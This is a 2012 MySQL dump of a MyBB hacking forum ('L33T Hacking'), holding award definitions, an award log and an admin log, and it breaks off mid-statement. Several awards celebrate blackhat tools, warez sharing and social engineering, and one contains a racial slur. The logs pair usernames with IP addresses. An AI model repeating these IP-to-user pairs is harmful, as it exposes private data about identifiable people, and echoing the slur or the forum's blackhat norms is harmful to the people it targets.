-- MySQL Database Dump -- Host: localhost Database: lthackin_joker -- ----------------------------------------------------- -- Server Version: 5.5.27-cll -- Dumped on: November 13, 2012, 4:25 pm DROP TABLE IF EXISTS `mybb_achivements_achivement`; CREATE TABLE `mybb_achivements_achivement` ( `aaid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `description` text NOT NULL, `image` varchar(250) NOT NULL DEFAULT '', `achivements` text NOT NULL, PRIMARY KEY (`aaid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_achivement` WRITE; INSERT INTO `mybb_achivements_achivement` (`aaid`, `name`, `description`, `image`, `achivements`) VALUES ('1', 'Rich Bitch', 'You have helped keep LH up with your great donations.', 'inc/plugins/achivements/upload/achivement_21_10_12_12_22_02.png', 'a:1:{s:4:\"acid\";a:4:{i:2;a:1:{s:4:\"acid\";s:1:\"2\";}i:3;a:1:{s:4:\"acid\";s:1:\"3\";}i:4;a:1:{s:4:\"acid\";s:1:\"4\";}i:5;a:1:{s:4:\"acid\";s:1:\"5\";}}}'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_custom`; CREATE TABLE `mybb_achivements_custom` ( `acid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `reason` text NOT NULL, `image` varchar(250) NOT NULL DEFAULT '', `modcp` int(10) NOT NULL DEFAULT '0', PRIMARY KEY (`acid`) ) ENGINE=MyISAM AUTO_INCREMENT=28 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_custom` WRITE; INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('1', 'SE Legend', 'Social Engineering and/or Manipulation Pro.', 'inc/plugins/achivements/upload/custom_20_10_12_11_54_35.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('2', 'Stingy ', 'You have donated at least $5 to L33T Hacking.', 'inc/plugins/achivements/upload/custom_20_10_12_11_58_23.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('3', 'Emerald Donator', 'User donated $10-20 to LH.', 'inc/plugins/achivements/upload/custom_20_10_12_11_59_47.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('4', 'Fav mod donate', 'This user has donated money to their favorite mod.', 'inc/plugins/achivements/upload/custom_21_10_12_12_00_20.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('5', 'Master Donator', 'Has donated $50+ to LH. This excludes sticky purchases and upgrades (AIO)', 'inc/plugins/achivements/upload/custom_21_10_12_12_01_03.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('6', 'Black Hat', 'A proven black hat gets this award.', 'inc/plugins/achivements/upload/custom_21_10_12_12_02_07.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('7', 'Dangerous Programmer ', 'Create and give away 3+ blackhat tools and/or programs for free on LH. This excludes Chat Spammer, Doxer and resolver. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_04_38.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('8', 'Angel', 'Has done well helping others. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('9', 'Referrer ', 'You have referred 10 or more members. All must be activated. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_07_10.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('10', 'MOTM', 'Member of the Month Trophy. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_07_39.jpg', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('27', 'Elite', 'Special Award to signify Elite Status', 'inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('26', 'Sticky', 'Made a thread worth a sticky.', 'inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('13', 'Gamer', 'You are too addicted to gaming.', 'inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('14', 'Swag', 'Nigga mad flee. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('15', 'Silver Brick', 'Earn this by posting a great original tutorial.', 'inc/plugins/achivements/upload/custom_21_10_12_12_18_16.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('16', 'Gold Brick', 'Earn this by upload amazing files to LH.', 'inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('17', 'Reporter', 'Has reported a lot of SPAM on LH. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('18', 'Advanced BH Contributor', 'Has shared a lot of warez or premium accounts.', 'inc/plugins/achivements/upload/custom_21_10_12_12_23_54.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('19', 'Genius', 'If you just have too much knowledge.', 'inc/plugins/achivements/upload/custom_21_10_12_12_25_10.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('20', 'Thinker', 'Has made an excellent suggestion to help improve LH.', 'inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png', '0'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('21', 'Music Fan', 'You like listening to music. Not easy to get :P', 'inc/plugins/achivements/upload/custom_21_10_12_12_28_47.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('22', 'Painter', 'Good at graphic designing. ', 'inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('23', 'Ass Kisser', 'Self-Explainatory', 'inc/plugins/achivements/upload/custom_21_10_12_1_35_58.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('24', 'YouTube', 'Create a YouTube video advertising LH, include your UID in the video.', 'inc/plugins/achivements/upload/custom_21_10_12_1_44_00.png', '1'); INSERT INTO `mybb_achivements_custom` (`acid`, `name`, `reason`, `image`, `modcp`) VALUES ('25', 'Diamond', 'It\'s an award for those who are HQ members and have contributed a lot to the community also helped a lot of members. Members with this award are and will always be respected by the admins of LH. ', 'inc/plugins/achivements/upload/custom_21_10_12_1_48_27.jpg', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_customlog`; CREATE TABLE `mybb_achivements_customlog` ( `lid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `user` int(10) NOT NULL, `dateline` bigint(30) NOT NULL, `log` text NOT NULL, `ipaddress` varchar(50) NOT NULL, PRIMARY KEY (`lid`) ) ENGINE=MyISAM AUTO_INCREMENT=24 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_customlog` WRITE; INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('1', '1', '1350860127', 'Log eliminated', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('2', '1', '1350862204', 'Achieving Elite has been delivered to the user HoverCatz', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('3', '1', '1350862214', 'Achieving Elite has been delivered to the user mothered', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('4', '1', '1350862283', 'Achieving Elite has been delivered to the user PiXEL^OG', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('5', '1', '1350862293', 'Achieving Elite has been delivered to the user sbhshroy2', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('6', '1', '1350862313', 'Achieving Elite has been delivered to the user Timmy', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('7', '1', '1350862325', 'Achieving Elite has been delivered to the user ƒ???????????g', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('8', '1', '1350862336', 'Achieving Elite has been delivered to the user ??zg???g????61', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('9', '1', '1350862351', 'Achieving Elite has been delivered to the user xEP1C_SC0P3Sx', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('10', '1', '1350862664', 'Achieving Elite has been delivered to the user sirchamp', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('11', '1', '1350862676', 'Achieving Elite has been delivered to the user R?????zo?', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('12', '1', '1350862684', 'Achieving Elite has been delivered to the user NXK', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('13', '1', '1350862696', 'Achieving Elite has been delivered to the user iTzIpod', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('14', '1', '1350862828', 'Achieving Gamer has been delivered to the user xEP1C_SC0P3Sx', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('15', '2', '1350875035', 'Achieving Painter has been delivered to the user Apathy', '173.206.138.180'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('16', '61', '1350875466', 'Achieving SE Legend has been delivered to the user ƒ???????????g', '99.253.94.204'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('17', '61', '1350875491', 'Achieving Painter has been delivered to the user ƒ???????????g', '99.253.94.204'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('18', '61', '1350875532', 'Achieving Swag has been delivered to the user ƒ???????????g', '99.253.94.204'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('19', '61', '1350875556', 'Achieving Dangerous Programmer has been delivered to the user NXK', '99.253.94.204'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('20', '61', '1350875568', 'Achieving Swag has been delivered to the user NXK', '99.253.94.204'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('21', '1', '1351621456', 'Achieving Elite has been delivered to the user Mac Miller', '72.231.24.165'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('22', '61', '1352328180', 'Achieving Fav mod donate has been delivered to the user HoverCatz', '99.252.235.12'); INSERT INTO `mybb_achivements_customlog` (`lid`, `user`, `dateline`, `log`, `ipaddress`) VALUES ('23', '1', '1352535383', 'Achieving YouTube has been delivered to the user Timmy', '72.231.24.165'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_posts`; CREATE TABLE `mybb_achivements_posts` ( `apid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `description` varchar(200) NOT NULL DEFAULT '', `posts` int(10) NOT NULL DEFAULT '0', `image` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`apid`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_posts` WRITE; INSERT INTO `mybb_achivements_posts` (`apid`, `name`, `description`, `posts`, `image`) VALUES ('1', 'Spammer', 'Given to those who have reached 1,000 posts.', '1000', 'inc/plugins/achivements/upload/posts_21_10_12_12_10_50.png'); INSERT INTO `mybb_achivements_posts` (`apid`, `name`, `description`, `posts`, `image`) VALUES ('2', 'Posting Freak', 'This user has 500+ posts.', '500', 'inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png'); INSERT INTO `mybb_achivements_posts` (`apid`, `name`, `description`, `posts`, `image`) VALUES ('3', 'Cheers on 100', 'User has reached 100 posts', '100', 'inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_regdate`; CREATE TABLE `mybb_achivements_regdate` ( `rgid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `description` varchar(200) NOT NULL DEFAULT '', `regdate` int(10) NOT NULL DEFAULT '0', `regdatetype` varchar(120) NOT NULL DEFAULT '', `image` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`rgid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_regdate` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_reputation`; CREATE TABLE `mybb_achivements_reputation` ( `arid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `description` varchar(200) NOT NULL DEFAULT '', `reputation` int(10) NOT NULL DEFAULT '0', `image` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`arid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_reputation` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_threads`; CREATE TABLE `mybb_achivements_threads` ( `atid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `description` varchar(200) NOT NULL DEFAULT '', `threads` int(10) NOT NULL DEFAULT '0', `image` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`atid`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_threads` WRITE; INSERT INTO `mybb_achivements_threads` (`atid`, `name`, `description`, `threads`, `image`) VALUES ('1', 'Contributor ', 'Granted to those who have reached 100 threads.', '100', 'inc/plugins/achivements/upload/threads_21_10_12_12_11_32.png'); INSERT INTO `mybb_achivements_threads` (`atid`, `name`, `description`, `threads`, `image`) VALUES ('2', '10 Threads', 'This user has posted 10 threads.', '10', 'inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_achivements_timeonline`; CREATE TABLE `mybb_achivements_timeonline` ( `toid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL DEFAULT '', `description` varchar(200) NOT NULL DEFAULT '', `timeonline` int(10) NOT NULL DEFAULT '0', `timeonlinetype` varchar(120) NOT NULL DEFAULT '', `image` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`toid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_achivements_timeonline` WRITE; INSERT INTO `mybb_achivements_timeonline` (`toid`, `name`, `description`, `timeonline`, `timeonlinetype`, `image`) VALUES ('1', 'No life', 'This member has no life and is too addicted to LH.', '6', 'months', 'inc/plugins/achivements/upload/timeonline_21_10_12_1_45_52.png'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_adminlog`; CREATE TABLE `mybb_adminlog` ( `uid` int(10) unsigned NOT NULL DEFAULT '0', `ipaddress` varchar(50) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', `module` varchar(50) NOT NULL DEFAULT '', `action` varchar(50) NOT NULL DEFAULT '', `data` text NOT NULL, KEY `module` (`module`,`action`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_adminlog` WRITE; INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352144644', 'config-plugins', 'deactivate', 'a:2:{i:0;s:16:\"username_history\";i:1;b:0;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352013193', 'tools-modlog', 'prune', 'a:5:{i:0;s:1:\"0\";i:1;i:0;i:2;i:-1;i:3;i:23;i:4;N;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352013184', 'tools-adminlog', 'prune', 'a:4:{i:0;s:1:\"0\";i:1;i:0;i:2;s:0:\"\";i:3;i:42;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352180532', 'config-badwords', 'add', 'a:2:{i:0;i:14;i:1;s:10:\"*lthackin*\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '173.245.64.95', '1352183147', 'forum-tabmenu', '', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352244545', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_d3a3b5a2aaXFi93M85M7Vilp2XJ1SdwanEhTvL2jL69xtLZtrnvtJyS5bGX8AYtQ.sql.gz\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352244547', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_949baf3a6bwEA4S8yO9RdxpydO2YslGb8gtJgAFSoyG52xusQkPB6h4nyxVLgVnt.sql.gz\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352244550', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_a4d56077b8UGSpnEuAVygPJv667SJwGgfwOhevvYhGNBAt17J8cwzDp6ACI4aTZN.sql.gz\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352253203', 'user-users', 'ipaddresses', 'a:2:{i:0;s:3:\"326\";i:1;s:10:\"coolkid192\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352253766', 'user-users', 'edit', 'a:2:{i:0;s:3:\"302\";i:1;s:10:\"Mac Miller\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352253994', 'user-users', 'merge', 'a:4:{i:0;s:3:\"326\";i:1;s:10:\"coolkid192\";i:2;s:3:\"302\";i:3;s:10:\"Mac Miller\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352254307', 'user-users', 'merge', 'a:4:{i:0;s:3:\"290\";i:1;s:4:\"Boss\";i:2;s:3:\"302\";i:3;s:10:\"Mac Miller\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('61', '99.252.235.12', '1352254422', 'config-banning', 'add', 'a:3:{i:0;i:88;i:1;s:12:\"71.67.179.16\";i:2;s:1:\"1\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352258991', 'user-banning', '', 'a:3:{i:0;s:3:\"328\";i:1;s:6:\"Miller\";i:2;i:0;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352259499', 'tools/pms', 'delete', 'a:1:{i:4038;s:1:\"2\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352350002', 'forum-management', 'edit', 'a:2:{i:0;i:69;i:1;s:7:\"General\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352350408', 'tools/pms', 'delete', 'a:4:{i:4039;s:3:\"302\";i:4042;s:3:\"328\";i:4047;s:2:\"62\";i:4048;s:2:\"67\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '165.155.212.92', '1352478317', 'user-users', 'inline_activated', 'a:1:{i:0;i:1;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '165.155.212.92', '1352478379', 'tools-mailerrors', 'prune', 'a:1:{i:0;i:4;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352517141', 'user-users', 'inline_activated', 'a:1:{i:0;i:1;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352520382', 'config-settings', 'change', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352520393', 'config-settings', 'change', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352520702', 'config-settings', 'change', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352521755', 'forum-attachments', 'delete_orphans', 'a:0:{}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"2\";i:1;s:5:\"1.png\";i:2;s:3:\"237\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"3\";i:1;s:5:\"2.png\";i:2;s:3:\"237\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"4\";i:1;s:5:\"3.png\";i:2;s:3:\"237\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352521815', 'forum-attachments', 'delete', 'a:3:{i:0;s:1:\"5\";i:1;s:6:\"ms.png\";i:2;s:4:\"3179\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352526415', 'user-users', 'edit', 'a:2:{i:0;s:1:\"4\";i:1;s:8:\"Triple H\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352529037', 'forum-management', 'add', 'a:2:{i:0;i:84;i:1;s:23:\"Other Premium Giveaways\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352529388', 'forum-management', 'edit', 'a:2:{i:0;i:30;i:1;s:17:\"Premium Downloads\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352530596', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352534435', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_2cc8c3de83zPQEftSYayMGwx2XwTCx2tOFBcPYjo4SYmGbVBKTkfeP2hLuXe6P1f.sql.gz\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352534438', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_2036347b018IS7ERdYAgZrAVwXKCRCQBex9clY4pnz3EEmb5mELGJN6hXozz5BZv.sql.gz\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352534441', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_5f3a52e271VXCEqRh6NIvuOpinLagSozuYmvARBrkxuZueIRvv6ZoJQnSvWlYj1A.sql.gz\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352577597', 'style-templates', 'edit_template', 'a:4:{i:0;N;i:1;s:6:\"report\";i:2;i:8;i:3;s:21:\"Coder Green Templates\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578004', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578040', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578212', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578501', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578556', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578600', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578626', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578697', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578743', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352578762', 'forum-management', 'edit', 'a:2:{i:0;i:50;i:1;s:17:\"Private Inquiries\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352661859', 'tools-tasks', 'run', 'a:2:{i:0;s:1:\"9\";i:1;s:9:\"Mass Mail\";}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352661940', 'user-users', 'inline_activated', 'a:1:{i:0;i:6;}'); INSERT INTO `mybb_adminlog` (`uid`, `ipaddress`, `dateline`, `module`, `action`, `data`) VALUES ('1', '72.231.24.165', '1352679969', 'tools-backupdb', 'delete', 'a:1:{i:0;s:78:\"backup_73d5ea97e0L7I14yfTODXqvcPBINCAYbKPQargVrjBxke1lyAxwM4sktmwKBZJxc.sql.gz\";}'); INSERT INTO `mybb_adminlog` 